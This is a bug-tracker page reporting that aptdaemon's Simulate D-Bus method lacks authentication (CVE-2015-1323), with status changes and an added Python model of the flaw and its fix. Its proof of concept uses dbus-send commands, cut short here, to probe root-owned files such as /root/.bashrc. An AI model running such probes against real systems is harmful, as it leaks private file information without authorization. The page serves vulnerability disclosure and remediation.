Simulate dbus method doesn't require authentication
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
aptdaemon (Ubuntu) | Fix Released | Critical | Michael Vogt |
Bug Description
Reported via email from Tavis Ormandy:
-----
$ dbus-send --print-reply --system --dest=
/org/debian/apt org.debian.
boolean:false
method return sender=:1.13166 -> dest=:1.13182 reply_serial=2
string "/org/debian/
$ dbus-send --print-reply --system --dest=
/org/debian/
org.debian.
Error org.debian.
Lintian check results for /root/.bashrc:
warning: "/root/.bashrc" cannot be processed.
$ dbus-send --print-reply --system --dest=
/org/debian/apt org.debian.
boolean:false
method return sender=:1.13166 -> dest=:1.13184 reply_serial=2
string "/org/debian/
$ dbus-send --print-reply --system --dest=
/org/debian/
org.debian.
Error org.debian.
/root/.bashrca
----
(mdeslaur): Not only does this expose the existence of arbitrary files, but it actually accesses them and processes untrusted packages.
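A model of the flaw described above and of the usual hardening, as an added example that is not aptdaemon's code or part of the original report: a privileged handler that touches a caller-supplied path before any authorization check, next to one that authorizes first and returns a single error. The function names, the `is_authorized` callback (standing in for whatever authorization check the service uses) and the sample files are assumptions made for illustration.

```python
import os
import tempfile

class NotAuthorized(Exception):
    """Caller failed the authorization check; the path was never touched."""

class RequestFailed(Exception):
    """Uniform failure that does not say why the path was rejected."""

def simulate_unchecked(path):
    # Models the reported behaviour: the privileged service touches the
    # caller-supplied path first, and its errors differ by file state.
    if not os.path.exists(path):
        raise FileNotFoundError(path)
    raise ValueError('"%s" cannot be processed' % path)

def simulate_checked(caller_uid, path, is_authorized):
    # 1. Authorize the caller before any use of the path.
    if not is_authorized(caller_uid):
        raise NotAuthorized("caller %d is not authorized" % caller_uid)
    # 2. Only then open the file, collapsing every failure into one error.
    try:
        with open(path, "rb") as fh:
            return fh.read(4)
    except OSError:
        raise RequestFailed("request could not be processed") from None

def probe(fn, *args):
    """Return the exception class name that a call exposes to the caller."""
    try:
        fn(*args)
        return "ok"
    except Exception as exc:
        return type(exc).__name__

def demo():
    # Constructed sample: one existing file and one missing path.
    with tempfile.TemporaryDirectory() as d:
        present = os.path.join(d, "present.deb")
        missing = os.path.join(d, "missing.deb")
        with open(present, "wb") as fh:
            fh.write(b"!<arch>\n")
        paths = (present, missing)
        deny, allow = (lambda uid: False), (lambda uid: uid == 0)
        return {
            "unchecked": [probe(simulate_unchecked, p) for p in paths],
            "denied": [probe(simulate_checked, 1000, p, deny) for p in paths],
            "allowed": [probe(simulate_checked, 0, p, allow) for p in paths],
        }

if __name__ == "__main__":
    print(demo())
```

In the unchecked handler the two paths produce different errors, which is the file-existence signal shown in the report; in the checked handler a denied caller sees the same error for both.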
Changed in aptdaemon (Ubuntu):
status: New → Triaged
importance: Undecided → Critical
Changed in aptdaemon (Ubuntu):
assignee: nobody → Michael Vogt (mvo)
Changed in aptdaemon (Ubuntu):
status: Triaged → In Progress
information type: Private Security → Public Security
tags: added: patch
no longer affects: software-center-aptdaemon-plugins (Ubuntu)
This is CVE-2015-1323